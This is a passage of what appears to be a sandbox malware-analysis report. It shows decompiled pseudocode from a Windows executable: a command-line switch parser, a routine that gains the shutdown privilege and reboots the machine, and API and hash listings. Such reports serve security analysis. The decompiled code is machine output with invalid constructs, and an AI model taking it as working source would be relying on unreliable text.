                                                                        				intOrPtr* _t220;
                                                                        				signed int _t221;
                                                                        				signed int _t223;
                                                                        
                                                                        				_t173 = __ecx;
                                                                        				_t61 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t61 ^ _t221;
                                                                        				_push(__ebx);
                                                                        				_push(__esi);
                                                                        				_push(__edi);
                                                                        				_t209 = 1;
                                                                        				if(__ecx == 0 ||  *__ecx == 0) {
                                                                        					_t63 = 1;
                                                                        				} else {
                                                                        					L2:
                                                                        					while(_t209 != 0) {
                                                                        						_t67 =  *_t173;
                                                                        						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                        							_t173 = CharNextA(_t173);
                                                                        							continue;
                                                                        						}
                                                                        						_v272 = _t173;
                                                                        						if(_t67 == 0) {
                                                                        							break;
                                                                        						} else {
                                                                        							_t69 = _v272;
                                                                        							_t177 = 0;
                                                                        							_t213 = 0;
                                                                        							_t163 = 0;
                                                                        							_t202 = 1;
                                                                        							do {
                                                                        								if(_t213 != 0) {
                                                                        									if(_t163 != 0) {
                                                                        										break;
                                                                        									} else {
                                                                        										goto L21;
                                                                        									}
                                                                        								} else {
                                                                        									_t69 =  *_t69;
                                                                        									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                        										break;
                                                                        									} else {
                                                                        										_t69 = _v272;
                                                                        										L21:
                                                                        										_t155 =  *_t69;
                                                                        										if(_t155 != 0x22) {
                                                                        											if(_t202 >= 0x104) {
                                                                        												goto L106;
                                                                        											} else {
                                                                        												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                        												_t177 = _t177 + 1;
                                                                        												_t202 = _t202 + 1;
                                                                        												_t157 = 1;
                                                                        												goto L30;
                                                                        											}
                                                                        										} else {
                                                                        											if(_v272[1] == 0x22) {
                                                                        												if(_t202 >= 0x104) {
                                                                        													L106:
                                                                        													_t63 = 0;
                                                                        													L125:
                                                                        													_pop(_t210);
                                                                        													_pop(_t212);
                                                                        													_pop(_t162);
                                                                        													return E00F36CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                        												} else {
                                                                        													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                        													_t177 = _t177 + 1;
                                                                        													_t202 = _t202 + 1;
                                                                        													_t157 = 2;
                                                                        													goto L30;
                                                                        												}
                                                                        											} else {
                                                                        												_t157 = 1;
                                                                        												if(_t213 != 0) {
                                                                        													_t163 = 1;
                                                                        												} else {
                                                                        													_t213 = 1;
                                                                        												}
                                                                        												goto L30;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								goto L131;
                                                                        								L30:
                                                                        								_v272 =  &(_v272[_t157]);
                                                                        								_t69 = _v272;
                                                                        							} while ( *_t69 != 0);
                                                                        							if(_t177 >= 0x104) {
                                                                        								E00F36E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                        								asm("int3");
                                                                        								_push(_t221);
                                                                        								_t222 = _t223;
                                                                        								_t71 =  *0xf38004; // 0xc69e30f7
                                                                        								_v296 = _t71 ^ _t223;
                                                                        								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                        									0x4f0 = 2;
                                                                        									_t75 = E00F3597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                        								} else {
                                                                        									E00F344B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                        									 *0xf39124 = E00F36285();
                                                                        									_t75 = 0;
                                                                        								}
                                                                        								return E00F36CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                        							} else {
                                                                        								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                        								if(_t213 == 0) {
                                                                        									if(_t163 != 0) {
                                                                        										goto L34;
                                                                        									} else {
                                                                        										goto L40;
                                                                        									}
                                                                        								} else {
                                                                        									if(_t163 != 0) {
                                                                        										L40:
                                                                        										_t79 = _v268;
                                                                        										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                        											_t83 = CharUpperA(_v267) - 0x3f;
                                                                        											if(_t83 == 0) {
                                                                        												_t202 = 0x521;
                                                                        												E00F344B9(0, 0x521, 0xf31140, 0, 0x40, 0);
                                                                        												_t85 =  *0xf38588; // 0x0
                                                                        												if(_t85 != 0) {
                                                                        													CloseHandle(_t85);
                                                                        												}
                                                                        												ExitProcess(0);
                                                                        											}
                                                                        											_t87 = _t83 - 4;
                                                                        											if(_t87 == 0) {
                                                                        												if(_v266 != 0) {
                                                                        													if(_v266 != 0x3a) {
                                                                        														goto L49;
                                                                        													} else {
                                                                        														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                        														_t215 =  &_v268 + _t167;
                                                                        														_t183 =  &_v268 + _t167;
                                                                        														_t50 = _t183 + 1; // 0x1
                                                                        														_t202 = _t50;
                                                                        														do {
                                                                        															_t88 =  *_t183;
                                                                        															_t183 = _t183 + 1;
                                                                        														} while (_t88 != 0);
                                                                        														if(_t183 == _t202) {
                                                                        															goto L49;
                                                                        														} else {
                                                                        															_t205 = 0x5b;
                                                                        															if(E00F3667F(_t215, _t205) == 0) {
                                                                        																L115:
                                                                        																_t206 = 0x5d;
                                                                        																if(E00F3667F(_t215, _t206) == 0) {
                                                                        																	L117:
                                                                        																	_t202 =  &_v276;
                                                                        																	_v276 = _t167;
                                                                        																	if(E00F35C17(_t215,  &_v276) == 0) {
                                                                        																		goto L49;
                                                                        																	} else {
                                                                        																		_t202 = 0x104;
                                                                        																		E00F31680(0xf38c42, 0x104, _v276 + _t167 +  &_v268);
                                                                        																	}
                                                                        																} else {
                                                                        																	_t202 = 0x5b;
                                                                        																	if(E00F3667F(_t215, _t202) == 0) {
                                                                        																		goto L49;
                                                                        																	} else {
                                                                        																		goto L117;
                                                                        																	}
                                                                        																}
                                                                        															} else {
                                                                        																_t202 = 0x5d;
                                                                        																if(E00F3667F(_t215, _t202) == 0) {
                                                                        																	goto L49;
                                                                        																} else {
                                                                        																	goto L115;
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												} else {
                                                                        													 *0xf38a24 = 1;
                                                                        												}
                                                                        												goto L50;
                                                                        											} else {
                                                                        												_t100 = _t87 - 1;
                                                                        												if(_t100 == 0) {
                                                                        													L98:
                                                                        													if(_v266 != 0x3a) {
                                                                        														goto L49;
                                                                        													} else {
                                                                        														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                        														_t217 =  &_v268 + _t170;
                                                                        														_t192 =  &_v268 + _t170;
                                                                        														_t38 = _t192 + 1; // 0x1
                                                                        														_t202 = _t38;
                                                                        														do {
                                                                        															_t101 =  *_t192;
                                                                        															_t192 = _t192 + 1;
                                                                        														} while (_t101 != 0);
                                                                        														if(_t192 == _t202) {
                                                                        															goto L49;
                                                                        														} else {
                                                                        															_t202 =  &_v276;
                                                                        															_v276 = _t170;
                                                                        															if(E00F35C17(_t217,  &_v276) == 0) {
                                                                        																goto L49;
                                                                        															} else {
                                                                        																_t104 = CharUpperA(_v267);
                                                                        																_t218 = 0xf38b3e;
                                                                        																_t105 = _v276;
                                                                        																if(_t104 != 0x54) {
                                                                        																	_t218 = 0xf38a3a;
                                                                        																}
                                                                        																E00F31680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                        																_t202 = 0x104;
                                                                        																E00F3658A(_t218, 0x104, 0xf31140);
                                                                        																if(E00F331E0(_t218) != 0) {
                                                                        																	goto L50;
                                                                        																} else {
                                                                        																	goto L106;
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												} else {
                                                                        													_t111 = _t100 - 0xa;
                                                                        													if(_t111 == 0) {
                                                                        														if(_v266 != 0) {
                                                                        															if(_v266 != 0x3a) {
                                                                        																goto L49;
                                                                        															} else {
                                                                        																_t199 = _v265;
                                                                        																if(_t199 != 0) {
                                                                        																	_t219 =  &_v265;
                                                                        																	do {
                                                                        																		_t219 = _t219 + 1;
                                                                        																		_t115 = CharUpperA(_t199) - 0x45;
                                                                        																		if(_t115 == 0) {
                                                                        																			 *0xf38a2c = 1;
                                                                        																		} else {
                                                                        																			_t200 = 2;
                                                                        																			_t119 = _t115 - _t200;
                                                                        																			if(_t119 == 0) {
                                                                        																				 *0xf38a30 = 1;
                                                                        																			} else {
                                                                        																				if(_t119 == 0xf) {
                                                                        																					 *0xf38a34 = 1;
                                                                        																				} else {
                                                                        																					_t209 = 0;
                                                                        																				}
                                                                        																			}
                                                                        																		}
                                                                        																		_t118 =  *_t219;
                                                                        																		_t199 = _t118;
                                                                        																	} while (_t118 != 0);
                                                                        																}
                                                                        															}
                                                                        														} else {
                                                                        															 *0xf38a2c = 1;
                                                                        														}
                                                                        														goto L50;
                                                                        													} else {
                                                                        														_t127 = _t111 - 3;
                                                                        														if(_t127 == 0) {
                                                                        															if(_v266 != 0) {
                                                                        																if(_v266 != 0x3a) {
                                                                        																	goto L49;
                                                                        																} else {
                                                                        																	_t129 = CharUpperA(_v265);
                                                                        																	if(_t129 == 0x31) {
                                                                        																		goto L76;
                                                                        																	} else {
                                                                        																		if(_t129 == 0x41) {
                                                                        																			goto L83;
                                                                        																		} else {
                                                                        																			if(_t129 == 0x55) {
                                                                        																				goto L76;
                                                                        																			} else {
                                                                        																				goto L49;
                                                                        																			}
                                                                        																		}
                                                                        																	}
                                                                        																}
                                                                        															} else {
                                                                        																L76:
                                                                        																_push(2);
                                                                        																_pop(1);
                                                                        																L83:
                                                                        																 *0xf38a38 = 1;
                                                                        															}
                                                                        															goto L50;
                                                                        														} else {
                                                                        															_t132 = _t127 - 1;
                                                                        															if(_t132 == 0) {
                                                                        																if(_v266 != 0) {
                                                                        																	if(_v266 != 0x3a) {
                                                                        																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                        																			goto L49;
                                                                        																		}
                                                                        																	} else {
                                                                        																		_t201 = _v265;
                                                                        																		 *0xf39a2c = 1;
                                                                        																		if(_t201 != 0) {
                                                                        																			_t220 =  &_v265;
                                                                        																			do {
                                                                        																				_t220 = _t220 + 1;
                                                                        																				_t142 = CharUpperA(_t201) - 0x41;
                                                                        																				if(_t142 == 0) {
                                                                        																					_t143 = 2;
                                                                        																					 *0xf39a2c =  *0xf39a2c | _t143;
                                                                        																					goto L70;
                                                                        																				} else {
                                                                        																					_t145 = _t142 - 3;
                                                                        																					if(_t145 == 0) {
                                                                        																						 *0xf38d48 =  *0xf38d48 | 0x00000040;
                                                                        																					} else {
                                                                        																						_t146 = _t145 - 5;
                                                                        																						if(_t146 == 0) {
                                                                        																							 *0xf39a2c =  *0xf39a2c & 0xfffffffd;
                                                                        																							goto L70;
                                                                        																						} else {
                                                                        																							_t147 = _t146 - 5;
                                                                        																							if(_t147 == 0) {
                                                                        																								 *0xf39a2c =  *0xf39a2c & 0xfffffffe;
                                                                        																								goto L70;
                                                                        																							} else {
                                                                        																								_t149 = _t147;
                                                                        																								if(_t149 == 0) {
                                                                        																									 *0xf38d48 =  *0xf38d48 | 0x00000080;
                                                                        																								} else {
                                                                        																									if(_t149 == 3) {
                                                                        																										 *0xf39a2c =  *0xf39a2c | 0x00000004;
                                                                        																										L70:
                                                                        																										 *0xf38a28 = 1;
                                                                        																									} else {
                                                                        																										_t209 = 0;
                                                                        																									}
                                                                        																								}
                                                                        																							}
                                                                        																						}
                                                                        																					}
                                                                        																				}
                                                                        																				_t144 =  *_t220;
                                                                        																				_t201 = _t144;
                                                                        																			} while (_t144 != 0);
                                                                        																		}
                                                                        																	}
                                                                        																} else {
                                                                        																	 *0xf39a2c = 3;
                                                                        																	 *0xf38a28 = 1;
                                                                        																}
                                                                        																goto L50;
                                                                        															} else {
                                                                        																if(_t132 == 0) {
                                                                        																	goto L98;
                                                                        																} else {
                                                                        																	L49:
                                                                        																	_t209 = 0;
                                                                        																	L50:
                                                                        																	_t173 = _v272;
                                                                        																	if( *_t173 != 0) {
                                                                        																		goto L2;
                                                                        																	} else {
                                                                        																		break;
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        										} else {
                                                                        											goto L106;
                                                                        										}
                                                                        									} else {
                                                                        										L34:
                                                                        										_t209 = 0;
                                                                        										break;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L131;
                                                                        					}
                                                                        					if( *0xf38a2c != 0 &&  *0xf38b3e == 0) {
                                                                        						if(GetModuleFileNameA( *0xf39a3c, 0xf38b3e, 0x104) == 0) {
                                                                        							_t209 = 0;
                                                                        						} else {
                                                                        							_t202 = 0x5c;
                                                                        							 *((char*)(E00F366C8(0xf38b3e, _t202) + 1)) = 0;
                                                                        						}
                                                                        					}
                                                                        					_t63 = _t209;
                                                                        				}
                                                                        				L131:
                                                                        			}


































































                                                                        0x00f35c9e
                                                                        0x00f35ca9
                                                                        0x00f35cb0
                                                                        0x00f35cb3
                                                                        0x00f35cb6
                                                                        0x00f35cb7
                                                                        0x00f35cb8
                                                                        0x00f35cbd
                                                                        0x00f36204
                                                                        0x00f35ccb
                                                                        0x00000000
                                                                        0x00f35ccb
                                                                        0x00f35cd3
                                                                        0x00f35cd7
                                                                        0x00f35cf4
                                                                        0x00000000
                                                                        0x00f35cf4
                                                                        0x00f35cf8
                                                                        0x00f35d00
                                                                        0x00000000
                                                                        0x00f35d06
                                                                        0x00f35d06
                                                                        0x00f35d0e
                                                                        0x00f35d10
                                                                        0x00f35d12
                                                                        0x00f35d14
                                                                        0x00f35d15
                                                                        0x00f35d17
                                                                        0x00f35d49
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f35d19
                                                                        0x00f35d19
                                                                        0x00f35d1d
                                                                        0x00000000
                                                                        0x00f35d3f
                                                                        0x00f35d3f
                                                                        0x00f35d4b
                                                                        0x00f35d4b
                                                                        0x00f35d4f
                                                                        0x00f35d8d
                                                                        0x00000000
                                                                        0x00f35d93
                                                                        0x00f35d93
                                                                        0x00f35d9a
                                                                        0x00f35d9d
                                                                        0x00f35d9e
                                                                        0x00000000
                                                                        0x00f35d9e
                                                                        0x00f35d51
                                                                        0x00f35d5b
                                                                        0x00f35d72
                                                                        0x00f360fb
                                                                        0x00f360fb
                                                                        0x00f36207
                                                                        0x00f3620a
                                                                        0x00f3620b
                                                                        0x00f3620e
                                                                        0x00f36217
                                                                        0x00f35d78
                                                                        0x00f35d78
                                                                        0x00f35d80
                                                                        0x00f35d83
                                                                        0x00f35d84
                                                                        0x00000000
                                                                        0x00f35d84
                                                                        0x00f35d5d
                                                                        0x00f35d5f
                                                                        0x00f35d62
                                                                        0x00f35d68
                                                                        0x00f35d64
                                                                        0x00f35d64
                                                                        0x00f35d64
                                                                        0x00000000
                                                                        0x00f35d62
                                                                        0x00f35d5b
                                                                        0x00f35d4f
                                                                        0x00f35d1d
                                                                        0x00000000
                                                                        0x00f35d9f
                                                                        0x00f35d9f
                                                                        0x00f35da5
                                                                        0x00f35dab
                                                                        0x00f35dba
                                                                        0x00f36218
                                                                        0x00f3621d
                                                                        0x00f36220
                                                                        0x00f36221
                                                                        0x00f36229
                                                                        0x00f36230
                                                                        0x00f36247
                                                                        0x00f3626a
                                                                        0x00f36272
                                                                        0x00f36249
                                                                        0x00f36255
                                                                        0x00f3625f
                                                                        0x00f36264
                                                                        0x00f36264
                                                                        0x00f36284
                                                                        0x00f35dc0
                                                                        0x00f35dc0
                                                                        0x00f35dca
                                                                        0x00f35e22
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f35dcc
                                                                        0x00f35dce
                                                                        0x00f35e24
                                                                        0x00f35e24
                                                                        0x00f35e2c
                                                                        0x00f35e47
                                                                        0x00f35e4a
                                                                        0x00f361d2
                                                                        0x00f361e2
                                                                        0x00f361e7
                                                                        0x00f361ee
                                                                        0x00f361f1
                                                                        0x00f361f1
                                                                        0x00f361f8
                                                                        0x00f361f8
                                                                        0x00f35e50
                                                                        0x00f35e53
                                                                        0x00f36109
                                                                        0x00f3611f
                                                                        0x00000000
                                                                        0x00f36125
                                                                        0x00f36137
                                                                        0x00f3613a
                                                                        0x00f3613c
                                                                        0x00f3613e
                                                                        0x00f3613e
                                                                        0x00f36141
                                                                        0x00f36141
                                                                        0x00f36143
                                                                        0x00f36144
                                                                        0x00f3614a
                                                                        0x00000000
                                                                        0x00f36150
                                                                        0x00f36152
                                                                        0x00f3615c
                                                                        0x00f36170
                                                                        0x00f36172
                                                                        0x00f3617c
                                                                        0x00f36190
                                                                        0x00f36190
                                                                        0x00f36196
                                                                        0x00f361a5
                                                                        0x00000000
                                                                        0x00f361ab
                                                                        0x00f361b9
                                                                        0x00f361c6
                                                                        0x00f361c6
                                                                        0x00f3617e
                                                                        0x00f36180
                                                                        0x00f3618a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3618a
                                                                        0x00f3615e
                                                                        0x00f36160
                                                                        0x00f3616a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3616a
                                                                        0x00f3615c
                                                                        0x00f3614a
                                                                        0x00f3610b
                                                                        0x00f3610e
                                                                        0x00f3610e
                                                                        0x00000000
                                                                        0x00f35e59
                                                                        0x00f35e59
                                                                        0x00f35e5c
                                                                        0x00f3604f
                                                                        0x00f36056
                                                                        0x00000000
                                                                        0x00f3605c
                                                                        0x00f3606e
                                                                        0x00f36071
                                                                        0x00f36073
                                                                        0x00f36075
                                                                        0x00f36075
                                                                        0x00f36078
                                                                        0x00f36078
                                                                        0x00f3607a
                                                                        0x00f3607b
                                                                        0x00f36081
                                                                        0x00000000
                                                                        0x00f36087
                                                                        0x00f36087
                                                                        0x00f3608d
                                                                        0x00f3609c
                                                                        0x00000000
                                                                        0x00f360a2
                                                                        0x00f360aa
                                                                        0x00f360b2
                                                                        0x00f360b7
                                                                        0x00f360bd
                                                                        0x00f360bf
                                                                        0x00f360bf
                                                                        0x00f360d6
                                                                        0x00f360e0
                                                                        0x00f360e7
                                                                        0x00f360f5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f360f5
                                                                        0x00f3609c
                                                                        0x00f36081
                                                                        0x00f35e62
                                                                        0x00f35e62
                                                                        0x00f35e65
                                                                        0x00f35fd3
                                                                        0x00f35fe9
                                                                        0x00000000
                                                                        0x00f35fef
                                                                        0x00f35fef
                                                                        0x00f35ff7
                                                                        0x00f35ffd
                                                                        0x00f36003
                                                                        0x00f36006
                                                                        0x00f36011
                                                                        0x00f36014
                                                                        0x00f3603d
                                                                        0x00f36016
                                                                        0x00f36018
                                                                        0x00f36019
                                                                        0x00f3601b
                                                                        0x00f36033
                                                                        0x00f3601d
                                                                        0x00f36020
                                                                        0x00f36029
                                                                        0x00f36022
                                                                        0x00f36022
                                                                        0x00f36022
                                                                        0x00f36020
                                                                        0x00f3601b
                                                                        0x00f36042
                                                                        0x00f36044
                                                                        0x00f36046
                                                                        0x00f3604a
                                                                        0x00f35ff7
                                                                        0x00f35fd5
                                                                        0x00f35fd8
                                                                        0x00f35fd8
                                                                        0x00000000
                                                                        0x00f35e6b
                                                                        0x00f35e6b
                                                                        0x00f35e6e
                                                                        0x00f35f8b
                                                                        0x00f35f99
                                                                        0x00000000
                                                                        0x00f35f9f
                                                                        0x00f35fa7
                                                                        0x00f35faf
                                                                        0x00000000
                                                                        0x00f35fb1
                                                                        0x00f35fb3
                                                                        0x00000000
                                                                        0x00f35fb5
                                                                        0x00f35fb7
                                                                        0x00000000
                                                                        0x00f35fb9
                                                                        0x00000000
                                                                        0x00f35fb9
                                                                        0x00f35fb7
                                                                        0x00f35fb3
                                                                        0x00f35faf
                                                                        0x00f35f8d
                                                                        0x00f35f8d
                                                                        0x00f35f8d
                                                                        0x00f35f8f
                                                                        0x00f35fc1
                                                                        0x00f35fc1
                                                                        0x00f35fc1
                                                                        0x00000000
                                                                        0x00f35e74
                                                                        0x00f35e74
                                                                        0x00f35e77
                                                                        0x00f35ea0
                                                                        0x00f35ebd
                                                                        0x00f35f79
                                                                        0x00000000
                                                                        0x00f35f7f
                                                                        0x00f35ec3
                                                                        0x00f35ec3
                                                                        0x00f35ecc
                                                                        0x00f35ed4
                                                                        0x00f35ed6
                                                                        0x00f35edc
                                                                        0x00f35edf
                                                                        0x00f35eea
                                                                        0x00f35eed
                                                                        0x00f35f3f
                                                                        0x00f35f40
                                                                        0x00000000
                                                                        0x00f35eef
                                                                        0x00f35eef
                                                                        0x00f35ef2
                                                                        0x00f35f34
                                                                        0x00f35ef4
                                                                        0x00f35ef4
                                                                        0x00f35ef7
                                                                        0x00f35f2b
                                                                        0x00000000
                                                                        0x00f35ef9
                                                                        0x00f35ef9
                                                                        0x00f35efc
                                                                        0x00f35f22
                                                                        0x00000000
                                                                        0x00f35efe
                                                                        0x00f35eff
                                                                        0x00f35f02
                                                                        0x00f35f16
                                                                        0x00f35f04
                                                                        0x00f35f07
                                                                        0x00f35f0d
                                                                        0x00f35f46
                                                                        0x00f35f46
                                                                        0x00f35f09
                                                                        0x00f35f09
                                                                        0x00f35f09
                                                                        0x00f35f07
                                                                        0x00f35f02
                                                                        0x00f35efc
                                                                        0x00f35ef7
                                                                        0x00f35ef2
                                                                        0x00f35f4c
                                                                        0x00f35f4e
                                                                        0x00f35f50
                                                                        0x00f35f54
                                                                        0x00f35ed4
                                                                        0x00f35ea2
                                                                        0x00f35ea4
                                                                        0x00f35eaf
                                                                        0x00f35eaf
                                                                        0x00000000
                                                                        0x00f35e79
                                                                        0x00f35e7d
                                                                        0x00000000
                                                                        0x00f35e83
                                                                        0x00f35e83
                                                                        0x00f35e83
                                                                        0x00f35e85
                                                                        0x00f35e85
                                                                        0x00f35e8e
                                                                        0x00000000
                                                                        0x00f35e94
                                                                        0x00000000
                                                                        0x00f35e94
                                                                        0x00f35e8e
                                                                        0x00f35e7d
                                                                        0x00f35e77
                                                                        0x00f35e6e
                                                                        0x00f35e65
                                                                        0x00f35e5c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f35dd0
                                                                        0x00f35dd0
                                                                        0x00f35dd0
                                                                        0x00000000
                                                                        0x00f35dd0
                                                                        0x00f35dce
                                                                        0x00f35dca
                                                                        0x00f35dba
                                                                        0x00000000
                                                                        0x00f35d00
                                                                        0x00f35dd9
                                                                        0x00f35e04
                                                                        0x00f361fe
                                                                        0x00f35e0a
                                                                        0x00f35e0c
                                                                        0x00f35e17
                                                                        0x00f35e17
                                                                        0x00f35e04
                                                                        0x00f36200
                                                                        0x00f36200
                                                                        0x00000000

                                                                        APIs
                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 00F35CEE
                                                                        • GetModuleFileNameA.KERNEL32(00F38B3E,00000104,00000000,?,?), ref: 00F35DFC
                                                                        • CharUpperA.USER32(?), ref: 00F35E3E
                                                                        • CharUpperA.USER32(-00000052), ref: 00F35EE1
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00F35F6F
                                                                        • CharUpperA.USER32(?), ref: 00F35FA7
                                                                        • CharUpperA.USER32(-0000004E), ref: 00F36008
                                                                        • CharUpperA.USER32(?), ref: 00F360AA
                                                                        • CloseHandle.KERNEL32(00000000,00F31140,00000000,00000040,00000000), ref: 00F361F1
                                                                        • ExitProcess.KERNEL32 ref: 00F361F8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                        • String ID: "$"$:$RegServer
                                                                        • API String ID: 1203814774-25366791
                                                                        • Opcode ID: 698604415c508b28aca737a991957a25190da456946e3272abe9eda7148d5852
                                                                        • Instruction ID: 964560bd9b41a068dfaa7087030058dfa6bfd25377fa1e4a616e06c2734d6e89
                                                                        • Opcode Fuzzy Hash: 698604415c508b28aca737a991957a25190da456946e3272abe9eda7148d5852
                                                                        • Instruction Fuzzy Hash: B9D19171E08A486EDF35CB388C483FA3762AB95B74F1441A5D4D6DA151DAB48EC2BF00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 60%
                                                                        			E00F31F90(signed int __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				int _v12;
                                                                        				struct _TOKEN_PRIVILEGES _v24;
                                                                        				void* _v28;
                                                                        				void* __ebx;
                                                                        				signed int _t13;
                                                                        				int _t21;
                                                                        				void* _t25;
                                                                        				int _t28;
                                                                        				signed char _t30;
                                                                        				void* _t38;
                                                                        				void* _t40;
                                                                        				void* _t41;
                                                                        				signed int _t46;
                                                                        
                                                                        				_t41 = __esi;
                                                                        				_t38 = __edi;
                                                                        				_t30 = __ecx;
                                                                        				if((__ecx & 0x00000002) != 0) {
                                                                        					L12:
                                                                        					if((_t30 & 0x00000004) != 0) {
                                                                        						L14:
                                                                        						if( *0xf39a40 != 0) {
                                                                        							_pop(_t30);
                                                                        							_t44 = _t46;
                                                                        							_t13 =  *0xf38004; // 0xc69e30f7
                                                                        							_v8 = _t13 ^ _t46;
                                                                        							_push(_t38);
                                                                        							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                        								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                        								_v24.PrivilegeCount = 1;
                                                                        								_v12 = 2;
                                                                        								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                        								CloseHandle(_v28);
                                                                        								_t41 = _t41;
                                                                        								_push(0);
                                                                        								if(_t21 != 0) {
                                                                        									if(ExitWindowsEx(2, ??) != 0) {
                                                                        										_t25 = 1;
                                                                        									} else {
                                                                        										_t37 = 0x4f7;
                                                                        										goto L3;
                                                                        									}
                                                                        								} else {
                                                                        									_t37 = 0x4f6;
                                                                        									goto L4;
                                                                        								}
                                                                        							} else {
                                                                        								_t37 = 0x4f5;
                                                                        								L3:
                                                                        								_push(0);
                                                                        								L4:
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								E00F344B9(0, _t37);
                                                                        								_t25 = 0;
                                                                        							}
                                                                        							_pop(_t40);
                                                                        							return E00F36CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                        						} else {
                                                                        							_t28 = ExitWindowsEx(2, 0);
                                                                        							goto L16;
                                                                        						}
                                                                        					} else {
                                                                        						_t37 = 0x522;
                                                                        						_t28 = E00F344B9(0, 0x522, 0xf31140, 0, 0x40, 4);
                                                                        						if(_t28 != 6) {
                                                                        							goto L16;
                                                                        						} else {
                                                                        							goto L14;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					__eax = E00F31EA7(__ecx);
                                                                        					if(__eax != 2) {
                                                                        						L16:
                                                                        						return _t28;
                                                                        					} else {
                                                                        						goto L12;
                                                                        					}
                                                                        				}
                                                                        			}

















                                                                        0x00f31f90
                                                                        0x00f31f90
                                                                        0x00f31f93
                                                                        0x00f31f98
                                                                        0x00f31fa4
                                                                        0x00f31fa7
                                                                        0x00f31fc5
                                                                        0x00f31fcd
                                                                        0x00f31fdb
                                                                        0x00f31ee5
                                                                        0x00f31eea
                                                                        0x00f31ef1
                                                                        0x00f31ef4
                                                                        0x00f31f0c
                                                                        0x00f31f2e
                                                                        0x00f31f3a
                                                                        0x00f31f46
                                                                        0x00f31f4d
                                                                        0x00f31f58
                                                                        0x00f31f60
                                                                        0x00f31f61
                                                                        0x00f31f62
                                                                        0x00f31f75
                                                                        0x00f31f80
                                                                        0x00f31f77
                                                                        0x00f31f77
                                                                        0x00000000
                                                                        0x00f31f77
                                                                        0x00f31f64
                                                                        0x00f31f64
                                                                        0x00000000
                                                                        0x00f31f64
                                                                        0x00f31f0e
                                                                        0x00f31f0e
                                                                        0x00f31f13
                                                                        0x00f31f13
                                                                        0x00f31f14
                                                                        0x00f31f14
                                                                        0x00f31f16
                                                                        0x00f31f17
                                                                        0x00f31f1a
                                                                        0x00f31f1f
                                                                        0x00f31f1f
                                                                        0x00f31f86
                                                                        0x00f31f8f
                                                                        0x00f31fcf
                                                                        0x00f31fd3
                                                                        0x00000000
                                                                        0x00f31fd3
                                                                        0x00f31fa9
                                                                        0x00f31fb4
                                                                        0x00f31fbb
                                                                        0x00f31fc3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f31fc3
                                                                        0x00f31f9a
                                                                        0x00f31f9a
                                                                        0x00f31fa2
                                                                        0x00f31fd9
                                                                        0x00f31fda
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f31fa2

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00F31EFB
